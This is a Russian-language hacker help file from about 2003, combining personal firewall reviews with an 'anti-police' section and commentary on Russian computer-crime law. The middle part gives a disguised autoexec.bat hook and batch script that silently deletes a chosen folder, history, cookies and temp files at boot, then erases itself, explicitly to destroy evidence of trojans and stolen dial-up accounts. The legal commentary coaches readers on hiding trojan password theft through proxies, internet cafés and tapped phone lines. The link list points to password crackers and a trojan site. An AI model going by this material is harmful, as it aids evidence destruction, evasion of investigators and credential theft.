Пользователь изначально обеспечивается четырьмя типами начальных конфигураций: Dial-Up - модемный выход в интернет - блокируется весь ICMP; Cable - для кабельных и DSL-модемов; Browse - выбор готового файла настройки и None - для самостоятельного конфигурирования. Индивидуальному пользователю начинать с этого файерволла, наверное, не стоит, если только вы не готовы выучить наизусть всю инструкцию.

McAfee Personal Firewall (ConSeal Private Desktop)
www.mcafee.com

Еще одна перепроданная программа (вернее, "движок" от нее) - бывший ConSeal Private Desktop. Эта программа ориентирована в основном на рядового пользователя, в отличие от своего старшего брата - ConSeal PC Firewall.

Что мы имеем? Есть удобный и достаточно простой в использовании режим "обучения" программы, ставший практически стандартом для современных файерволлов. Не обошлось и без готового комплекта встроенных профайлов, вполне подходящих для первого знакомства с программой.

McAfee Personal Firewall умеет контролировать выход других программ в интернет, - блокировка исходящего трафика предотвратит ущерб от троянских программ. В случае попыток незарегистрированного в настройках файерволла приложения выйти в Сеть выскакивает диалоговое окно, требующее определиться, в какой из списков - "черный" или "белый" - занести эту программу. Из дополнительных функций стоит отметить разве что фильтрацию фрагментированных пакетов - в общем, не густо.

В администрировании этот продукт не очень удобен, и его, как и Zone Alarm, не рекомендуется устанавливать в больших сетях, хотя, учитывая то, что файерволл изначально рассчитан на индивидуальных пользователей, недостатком это назвать нельзя.

При тестировании программы нашелся неприятный "глюк", - каждые десять секунд система на мгновение подвисает.

Вышеперечисленными программами, разумеется, список персональных файерволлов далеко не ограничивается, и я вам также настоятельно рекомендую посмотреть, например, еще и новейший файерволл Sphinx Personal Firewall (shop2.sphinxwall.com), который просто предельно дружественен к пользователю, благодаря использованию Configuration Wizard - мастера настройки. С помощью вполне понятного (для не разбирающегося во всех премудростях сетевых технологий пользователя) диалога, ответив на несколько вопросов, вы сможете задать все необходимые начальные параметры файерволла. В результате уже через минуту после его инсталляции получите совершенно работоспособную систему при максимуме безопасности. Хотя веселенький интерфейс программы и наводит на мысли о ее несерьезности, это впечатление обманчиво, и мне кажется, что у Sphinx Personal Firewall очень хорошие перспективы, так как он обладает всеми возможностями маститых конкурентов.

Проверить же качество вашего файерволла и его настроек вы сможете на сайтах Security Scan и ShildsUP!, которые вместо хакера просканируют все ваши порты и найдут потенциальные "дыры" в защите вашей информации.

Agnitum Outpost Firewall
www.outpost.agnitum.com

Outpost Firewall - пожалуй один из самых популярных и функциональных фаерволов на сегодняшний день. Программа распростроняется в двух вариациях: это Free версия и Pro (shareware т.е. 30 дней). Отличия Free версии от Pro можно прочесть на официальном сайте брандмауэра здесь.

Как и большинство фаерволов, после запуска, программа садится в трей и сидит там фильтруя входящий и исходящий сетевой трафик, выявляя подозрительные действия и т.д. При первом запуске программа работает в так называемом Обучающем режиме, что значит при каждой попытке какого-нибудь приложения передать/принять данные в интернет будет выскакививать окно, в котором фаервол предложит создать правило для этого приложения или выбрать одно из стандартных правил (они уже есть для более распространённых приложений, таких как Internet Explorer, The BAT! и другие) также можно вообще запретить этому приложению передавать данные. Ещё кроме обучающего режима в проге существует ещё четыре: Режим бездействия (думаю здесь понятно, прога просто сидит и ни начто не реагирует), Режим разрешения (прога будет разрешать всем приложениям передавать/принимать данные в инет, которые ранее не были заблокированы), Режим Блокировки (прога будет блокировать все соединения, которые ранее небыли заблокированы) и последний режим - Блокировать всё (т.е. прога блокирует абсолютно все соединения).

Очень удобной "фичей" в проге является режим "невидимки" когда остальные компьютеры в сети будут не в состоянии определить ваше нахождение в сети (не отвечает на пинги и не выдает port unreachable). На программу можно поставить пароль, чтобы никто не смог просмотреть/поменять настройки брандмауэра. Также у программы существует множество plug-in'ов.

В стандартный комплект програмы входят следующие модули:

1. Блокировка рекламы - блокирует все баннеры на сайтах (т.е. блокирует картинки размеров баннеров 100х100, 468х60 и т.д.) и рекламные строки (рекламные URL'ы). Существует возможность открыть так называемую корзину (маленькое окошко размером 60х60, которые висит поверх всех окон) и Если вдруг вы увидите на сайте рекламный баннер, достаточно будет нажать на него левой кнопкой мыши и не отпуская перетащить его в Корзину. Прога запомнит адрес и этой рекламы вы больше никогда не увидите. Удобная "фичя" для тех у кого медленное соединения с инетом.
2. Блокировака по содержанию - этот модуль может фильтровать как адреса веб-страничек, так и их содержимое. Например если вы не хотите, чтобы ваш сына (или дочь) не бродил по порно сайтам, вы просто вводите в пармаетры плагина например слово "porno", "sex" и т.д. и тогда при первом обнаружении этих слов на web-страничке фаервол будет автоматически блокировать загрузку страницы и выдавать соответсвуещее сообщение: "The web page being accessed was blocked due to undersiable content. Please see the Outpost Content Filtering Plug-In Log for detalis". Недостаток этой "фичи" в том, что если слово находится где-то в конце страницы, возможно страничка будет загружена.
3. Кэш DNS - этот модуль записывает все данные пришедшие из инета в виде Дата, URL, IP. Это позволяет браузеру не соединяться с DNS сервером при каждом запросе. Это может немнго повысить скорость работы в сети.
4. Блокировка Web-элементов - настройка отображения ActiveX-элеметов, Java Scripts, Cookies и т.д. на web-страницах и в письмах приходящих по почте. Модуль создан для дополнитльной защиты от вирусов, которые могут содержаться в Active-X-элементах например.
5. Защита файлов - этот модуль анализирует каждый тип файла приходящий по почте, для каждого типа файла надо создать правило.
6. Детектор атак - детектит все атаки из инета. Прога предупредит если какйо-либо из ваших открытых портов (один или несколько, смотря какой уровень безопасности вы поставите) кто-то начнёт сканировать.

Все плагины работают вне зависимости какой режим фаервола вы поставили (Режим бездействия, режим обучения и т.д.)

У проги также ещё много мелких приятных прибамбасов. Подойдёт как и для просто "диал-апщика", так и для локальной сети. Работает со следующими ОС: 95/98/ME/NT/2000/XP.


АнтиОМОН

Если ты из тех, кому по ночам снятся сотрудники ФСБ, при виде милиционера ты начинаешь усиленно шифроваться или просто хочешь, чтоб твой винчестер без лишнего гимора был дотупен только тебе, эта статья как раз для тебя.
Представь такую ситуацию, ты сидишь перед телеком, смотришь Санта Барбару и тут раздаётся звонок. Ты открываешь дверь и в квартиру входят несколько амбалов, представившись сотрудниками ФСБ =)Они просят тебя включить компьютер. Ты включаешь. Полазив пару минут по твоему винчестеру, они находят и твой любимый Sub7 с ОбманиСоседа, и Voidozer, и кучу ворованных даил апов.
Затем заламывают тебе руку и везут в следственный изолятор. Как тебе? А ведь всё могло бы быть и подругому.
Конечно, самым надёжным способом являются крипто алгоритмы. Но за надёжность нужно платить гимором и разного рода неудобствами. В этой статье я расскажу тебе о простеньком самодельном защитном устройстве для твеого компа от посягательств посторонних людей.
Ладно, начнём.
Прежде всего все компроментирующие тебя данные ты должен хранить в одном каталоге (я рассматриваю именно такой случай). Возможно присутствие неограниченного числа подкаталогов в нём.Далее cкопируй свой autoexec.bat в файл autoexec.bak (тоже в корень диска С). Теперь открой autoexec.bat блокнотом и добавь в конец строчку:
load PCI Steering (PCI\IRQHOLDER\05)
Не пугайся, она такая чудная, чтоб все подумали, что она чисто системная. Далее посмотри, есть ли в твоём autoexec'e cтрочка вроди:
set PATH=список_папок
Вместо "список_папок" там должна быть прописана папка с твоей виндой и ещё пара. Если такого вообще не наблюдается, добавь строчку:
set PATH=%windir%\command
Всё, мы приготовились к внедрению самого механизма. Теперь cоздай в каталоге "c:\windows\command\" файл load.bat. Его содержание должно быть таким:

@echo off
echo --- By windows setup ---
@choice /c:za /N /T:a,5
@if errorlevel 2 goto its_ok
@deltree /y каталог_с_прогами_который_нужно_удалить
@cls
@deltree /y %windir%\Tempor~1\*.* > dead
@deltree /y %windir%\Tempor~1\dead
@cls
@deltree /y %windir%\History\*.* > dead
@deltree /y %windir%\History\dead
@cls
@deltree /y %windir%\Cookies\*.txt > dead
@deltree /y %windir%\Cookies\dead
@cls
@deltree /y %windir%\TEMP\*.* > dead
@deltree /y %windir%\TEMP\dead
@cls
@deltree /y c:\autoexec.bat
@cls
@ren c:\autoexec.bak autoexec.bat
@deltree /y %windir%\command\load.bat
:its_ok

Всё. Теперь перегружай комп и наслаждайся.
Фишка вся в том, что при загрузке компа, как только ты увидишь на экране надпись "--- By windows setup ---" ты должен будешь нажать на кнопку "Z". Если в течение пяти секунд ты на неё не нажмёшь, сотрётся каталог с твоими прогами и почистятся папки с временными инет файлами (типа логов). Как тебе? =) Тоесть ты один знаешь, как избежать этого дестроя. И самое главное, что сам дестрой будет проходить совершенно незаметно и по завершению оного данный механизм самоуничтожется. Тоесть никто и не узнает, что вообще что-то на твоём компе было (подредактированный autoexec.bat тоже заменяется на старый).
Если тебя ломает при каждой загрузке нажимать на Z, можешь сделать так, чтобы наоборот при нажатии на кнопку происходил дестрой. Тоесть у тебя будет 5 сек, чтобы нажать на кнопку "A" (именно A, а не Z) для уничтожения компромата. Для этого замени 4ую строчку на "@choice /c:za / N /T:z,5"
Если для тебя 5 сек это мало\много, то просто подредактируй 3тью строчку cкрипта (замени там число 5 на более подходящее).


Закон

Халява халявой, но нужно знать на что Вы идёте используя инет за чужой счёт...


УК

Уголовный Кодекс

Статья 272. НЕПРАВОМЕРНЫЙ ДОСТУП К КОМПЬЮТЕРНОЙ ИНФОРМАЦИИ

1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, - наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.

То есть, если ты не напортачил, не уничтожил данные и не скопировал их себе (нет доказательств-их копий у тебя на дисках), то ты чист. Так что если что-то копируешь, то всегда стирай то, что уже тебе не нужно (иногда FORMAT C: бессилен) параноидально прячь то, что нужно (на флопиках, матрицах и бумажках, но не у себя в квартире, а у соседа, друга или ... врага :))).

2. То же деяние, совершенное группой лиц по предварительному сговору или организованной группой либо лицом с использованием своего служебного положения, а равно имеющим доступ к ЭВМ, системе ЭВМ или их сети, - наказывается штрафом в размере от пятисот до восьмисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от пяти до восьми месяцев, либо исправительными работами на срок от одного года до двух лет, либо арестом на срок от трех до шести месяцев, либо лишением свободы на срок до пяти лет.

Вывод: Даже если тебя прищучили, и есть все улики и доказательства и в отказ ты идти уже не можешь, то бери на себя всю вину сам. Не верь наглым россказням ментов что, если ты скажешь, кто еще с тобой это совершил, то тебя отпустят, не будут бить и т.д. Отпускать тебя никто не станет - это их хлеб, премии и т.д. Насчет "бить" - уж пусть лучше из тебя сделают котлету, нежели ты сядешь вообще, сядешь на срок вдвое больший и подставишь своих корешей-подельников, которые тебе вряд ли за это будут благодарны.

Статья 273. СОЗДАНИЕ, ИСПОЛЬЗОВАНИЕ И РАСПРОСТРАНЕНИЕ ВРЕДОНОСНЫХ ПРОГРАММ ДЛЯ ЭВМ.

1. Создание программ для ЭВМ или внесение изменений в существующие программы, заведомо приводящих к несанкционированному уничтожению, блокированию, модификации либо копированию информации, нарушению работы ЭВМ, системы ЭВМ или их сети, а равно использование либо распространение таких программ или машинных носителей с такими программами - наказываются лишением свободы на срок до трех лет со штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев.

2. Те же деяния, повлекшие по неосторожности тяжкие последствия, - наказываются лишением свободы на срок от трех до семи лет.

То есть, если ты закинул трояна кому-то в комп и этот вирь шлет инфу и пароли юзера тебе на мыло, то, прежде чем
сделать такую гадость, 1000 раз подумай над ответом на следующие вопросы:

- ты регистрировал тот почтовый ящик на свои реальные имя и фамилию?
- ты регистрировал тот почтовый ящик через прокси, их цепочку, сокспрокси или же от своего реального АйПи?
- если ты юзал прокси, то был ли он Анонимным? Проверял ли ты его на Анонимность?
- Как ты забираешь отчеты трояна с того ящика? (из интернет-кафе - минимум опасности; из канализационного люка,
приконнектившись ноутбуком к случайно выбранной из тысячи телефонной "лапше" какой-либо из квартир; через кучу прокси; от друга; из своей квартиры - максимум опасности).
- оставил ты в том вире или на компе юзера какие-либо следы?
- ты был уверен, что юзер не юзал файрвол, ведущий лог, в котором зафиксирована твоя троян-атака?
- сам ли ты писал вирь и были ли у тебя ЗЛЫЕ умыслы, побудившие тебя, его написать или использовать? Обычно
состав преступления упирается в то, был ли умысел. Нет умысла - нет и состава преступления. Т.е. если ты закинул кому-то вируса, заведомо зная, что он безвреден, а все его действия сводятся к тому, что он рисует цветочек на экране с надписью "С любовью, Борис!", или же, закидывая виря ты не подозревал что ты делаешь такое и насколько это нехорошо - в этих случаях как бы злого умысла нет. Но тут есть одно "НО"... Оно заключается в том, а поверят ли тебе прокурор и судьи? Если ты считаешь, что все законники лохи, то я вынужден тебя разочаровать. Все они либо умные, либо хитрые, либо два в одном :)

Статья 274. НАРУШЕНИЕ ПРАВИЛ ЭКСПЛУАТАЦИИ ЭВМ, СИСТЕМЫ ЭВМ ИЛИ ИХ СЕТИ.

1. Нарушение правил эксплуатации ЭВМ, системы ЭВМ или их сети лицом, имеющим доступ к ЭВМ, системе ЭВМ или их сети, повлекшее уничтожение, блокирование или модификацию охраняемой законом информации ЭВМ, если это деяние причинило существенный вред, - наказывается лишением права занимать определенные должности или заниматься определенной деятельностью, на срок до пяти лет, либо обязательными работами на срок от ста восьмидесяти до двухсот сорока часов, либо ограничением свободы на срок до двух лет.

2. То же деяние, повлекшее по неосторожности тяжкие последствия, - наказывается лишением свободы на срок до четырех лет.

Нда, уж очень размывчато. "Блокирование" - т.е. ты просто всего-навсего вломился в чью-то аську, поменял пароль юзера на свой, таким образом, что юзер больше не может свою асю юзать (ну не обязательно УИНы и аська, например мейлбокс тоже подходит, да много всего подходит - рутовский пароль, например), то ты, заблокировал информацию, охраняемую законом. "Модификация" - сюда приплести они могут все что угодно... ВСЕ - например ты влез в мыльницу юзера и, не меняя его пароля на свой, всего лишь изменил его имя, введенное им при регистрации с Николай Кольцов на Василий Пупкин. Юзер как и прежде может юзать свой почтовый ящик, но заметь изменение имени - это уже предпосылка о заведении уголовного дела. Также, лазив по чьему-то компу, ты заменил атрибут какого-нибудь наигалимейшего файла на компе юзера с "скрытый" на "нескрытый архивный" например. По сути вреда мало, но под статью деяние попадает. А "нарушение эксплуатации" - это может быть всего лишь факт использования тобой всяких сканеров портов, CGI-дыр, даже галимых нюкеров и флудеров. Ах да, вывод... А вывод таков: подумай, насколько важно тебе то, что ты делаешь, и важнее ли оно свободы? Ну и подумай про степень риска.


Комментарии

Комментарии к УК

В данный момент комментарии обрабатываются в более понятную форму, пока вы можете посмотреть форум


About...

О хелпе...
< Назад Главная Вперёд >

Всё об этом замечательном хелпе :-) авторы, благодарности, ссылки.


Полезные ссылки

Ссылки

Ниже представленны полезные ссылки связаные с хелпом:

1. | Форум на котором всегда можно найти авторов хелпа.
2. | Используйте для поиска софта описанного в хелпе.
3. | На этом сайте вы сможете найти программы для взлома pwl и dat файлов от аськи, и многое другое.
4. | Сайт программы Essential Net Tools
5. | Сайт программы LANguard Network Scanner
6. | Shared Resource Scanner
7. | xSHaReZ & xIntrude
8. | Pandora Automatic Scanner
9. | PWL Tool
10. | Сайт трояна Lamers Death


What's New

Вот и вышла третья часть хелпа, так что радуйтесь и читайте. Как обычно была перелопачена гора
информации, добывались статьи с разных уголков Интернета, выслушивалась конструктивная критика, и многое другое.

Ну так вот Хистори:

Version 3.0
- Добавлены разделы Маскировка и Дистрибутивы в Трояны
- ICMP Tunneling
- P2P [by Gamer]
- АнтиОМОН
- Комментарии к УК
- Sita Update
- Обновлен раздел Безопасность
- Pandora Automatic Scanner [by The Undertaker]
- Добавлен пункт в раздел идея [про Total Commander, by The Undertaker]
- Добавлено описание Agnitum Outpost Firewall [by Sp0rtsteR]
- Default Passwords

Version 2.0
- Добавлена информация по мультилогинам и троянам [by re14]
- Также добавлен пункт в раздел идея [про Триллиан]
- Подробно описан язык скриптов
- Добавлено описания ряда различных файрволов
- Также внес комментарии к УК
- Получения халявной СИТЫ
- Инфа про прокси [сенкс to Igorek]

Version 1.0 - Первый релиз по многочисленным просьбам.
- Описание EssentialNetTools предоставлено Игорьком


Авторы
< Назад Главная

Идею данного хелпа подал Igorek, программная реализация Gamer & The Undertaker. Был собран и переработан огромный материал по данной теме, использованы примеры из личного опыта. Огромное спасибо p!ro, re14 и Sp0rtsteR за их вклад в наш проект.
Если вы не нашли какую либо программу, то поищите/спросите о ней на форуме Игорька www.bestfilez.net
В дальнейшем хелп будет дополнятся различной полезной информацией по данной теме. Так что если вам есть чем поделиться, то найдите нас и передайте ваши статьи, они будут опубликованы естественно с указанием авторских прав.

Кодер, дизайнер и оформитель хелпа The Undertaker [сайт]

Bestfilez.net Inc. FreeInet Help® by Gamer & Igorek & The Undertaker © 2001-2003 year
Version 3.0 made on February 2003